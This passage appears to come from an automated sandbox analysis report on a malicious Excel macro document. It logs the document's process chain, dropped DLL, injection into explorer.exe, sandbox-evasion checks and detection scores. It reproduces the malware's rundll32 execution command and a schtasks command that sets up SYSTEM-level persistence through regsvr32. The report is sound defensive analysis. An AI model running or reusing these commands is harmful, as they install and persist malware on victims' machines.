                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0024C927
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0024396B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_002509FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00248ADA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00244B1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00242BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00239B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00247B9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0023BC71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0024BD37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00243EF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00244FC3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0023AFD9
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008A60D
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009862B
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00093630
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008BA65
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008C6FD
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008FBC4
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000A1488
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009B0AF
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000940C2
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000A0D09
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00099566
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00094981
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000955A8
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000905E8
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00091217
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00095A4F
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008F267
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000A1E97
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009CABD
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00096AFA
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000A3AFF
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009AB20
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009735C
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00091F8B
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009D3B3
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009C7C3
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0008DBEC
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0009BBFA
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000943F7
                      Source: document-1055791644.xlsOLE indicator, VBA macros: true
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gif 63B470971FA827F8E59555C32E966B68EE765120849C23431DD352AEACBBA52B
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\iojhsfgv.dvers 9E6B6797944DD3EDD500BC13B5CDF9B74B9AFD215C9BED6EF3BEC26DB4396A7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 008A3E98 appears 76 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 008A5F7C appears 61 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 008A344C appears 34 times
                      Source: iojhsfgv.dvers.5.drStatic PE information: No import functions for PE file found
                      Source: document-1055791644.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                      Source: rundll32.exe, 00000003.00000002.2109070891.0000000001C20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2102690700.0000000001FB0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@18/14@1/1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008BD3AC GetLastError,FormatMessageA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F5FA8 EntryPoint,GetDiskFreeSpaceExA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00430483 CreateToolhelp32Snapshot,lstrcpynA,lstrcpynA,memset,GetOEMCP,GetOEMCP,lstrcpynA,Process32First,GetOEMCP,lstrcpynA,GetOEMCP,Process32Next,GetOEMCP,CloseHandle,lstrcpynA,lstrlenA,GetCurrentProcessId,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00436EC8 MultiByteToWideChar,CoInitializeEx,lstrcpynA,CoInitializeSecurity,lstrcpynA,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,SysAllocString,GetOEMCP,MultiByteToWideChar,lstrcpynA,CoSetProxyBlanket,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0042B14A lstrlenA,FindResourceA,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,GetOEMCP,MultiByteToWideChar,GetOEMCP,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\C7DE0000Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{356EE3B6-3452-4DAA-AF55-F855E45BD2D8}
                      Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{E72AFEF2-4BAA-4359-AC99-886389190D2C}
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCEA4.tmpJump to behavior
                      Source: document-1055791644.xlsOLE indicator, Workbook stream: true
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................4.%..........&k.....(.P.....p........................x................................................................%.....
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                      Source: document-1055791644.xlsVirustotal: Detection: 51%
                      Source: document-1055791644.xlsReversingLabs: Detection: 47%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54
                      Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {E6DEB525-2047-4F0F-A2D9-FEDA7F895D14} S-1-5-18:NT AUTHORITY\System:Service:
                      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54
                      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\taskeng.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{92BDB7E4-F28B-46A0-B551-45A52BDD5125}\InprocServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0044A196 push ebx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00449EE4 push cs; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00449FE6 push cs; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F5604 push 008F5691h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008D001C push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008DE158 push 008DE184h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C229C push 008C22C8h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008B02DE push 008B0356h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008B02E0 push 008B0356h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008CE21C push 008CE248h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C224C push 008C2278h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008CE384 push 008CE3B0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008BA3A2 push 008BA44Fh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008BA3A4 push 008BA44Fh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008D0314 push 008D0340h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008B0358 push 008B0400h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008B04EC push 008B0518h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008BA4EC push 008BA77Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008B0402 push 008B0518h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008BA454 push 008BA4E4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C6598 push ecx; mov dword ptr [esp], ecx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C45B4 push 008C45E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C45EC push 008C4618h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C4544 push 008C4593h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C2554 push 008C2580h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008DC554 push 008DC5AEh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C2688 push 008C26B4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C4694 push 008C46C0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C46CC push 008C46F8h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008E46D4 push 008E473Fh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C4624 push 008C4650h; ret
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\iojhsfgv.dversJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gifJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\iojhsfgv.dversJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gifJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\iojhsfgv.dvers
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\iojhsfgv.dversJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\iojhsfgv.dversJump to dropped file
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2508 base: 57102D value: E9 A4 61 B1 FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F0004 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008DA520 PostMessageA,PostMessageA,SendMessageA,70D9FFF6,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008F0928 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008DACF0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008DAC40 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008D7548 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008EF750 IsIconic,GetCapture,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008C1D04 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Contains functionality to detect sleep reduction / modificationsShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008CEF08
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00430483 CreateToolhelp32Snapshot,lstrcpynA,lstrcpynA,memset,GetOEMCP,GetOEMCP,lstrcpynA,Process32First,GetOEMCP,lstrcpynA,GetOEMCP,Process32Next,GetOEMCP,CloseHandle,lstrcpynA,lstrlenA,GetCurrentProcessId,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0702[1].gifJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008CEF08
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 2296Thread sleep time: -104000s >= -30000s
                      Source: C:\Windows\System32\taskeng.exe TID: 2792Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00431217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_008A4F40 GetModuleHandleA,70D9FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00091217 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,FindFirstFileW,MultiByteToWideChar,GetOEMCP,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,lstrcpynA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,FindNextFileW,GetOEMCP,lstrcpynA,GetOEMCP,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00435986 lstrlenA,GetOEMCP,GetSystemInfo,lstrlenA,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,MultiByteToWideChar,
                      Source: rundll32.exe, 00000004.00000002.2102558977.00000000004DF000.00000004.00000020.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
                      Source: rundll32.exe, 00000004.00000002.2102558977.00000000004DF000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00430483 CreateToolhelp32Snapshot,lstrcpynA,lstrcpynA,memset,GetOEMCP,GetOEMCP,lstrcpynA,Process32First,GetOEMCP,lstrcpynA,GetOEMCP,Process32Next,GetOEMCP,CloseHandle,lstrcpynA,lstrlenA,GetCurrentProcessId,
                      Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_000875E6 RtlAddVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Allocates memory in foreign processesShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: C0000 protect: page read and write
                      Injects code into the Windows Explorer (explorer.exe)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2508 base: C0000 value: 9C
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 2508 base: 57102D value: E9
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                      Writes to foreign memory regionsShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: C0000
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 57102D
                      Yara detected hidden Macro 4.0 in ExcelShow sources
                      Source: Yara matchFile source: document-1055791644.xls, type: SAMPLE
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\iojhsfgv.dvers,DllRegisterServer
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wwzkbggu /tr 'regsvr32.exe -s \'C:\Users\user\iojhsfgv.dvers\'' /SC ONCE /Z /ST 18:42 /ET 18:54
                      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\iojhsfgv.dvers'
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00433630 lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,lstrcpynA,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,MultiByteToWideChar,GetOEMCP,lstrlenA,lstrlenA,GetCurrentProcessId,LocalAlloc,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,GetOEMCP,GetOEMCP,GetOEMCP,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetOEMCP,lstrcpynA,GetOEMCP,MultiByteToWideChar,MultiByteToWideChar,lstrlenA,GetCurrentProcessId,lstrlenA,GetCurrentProcessId,
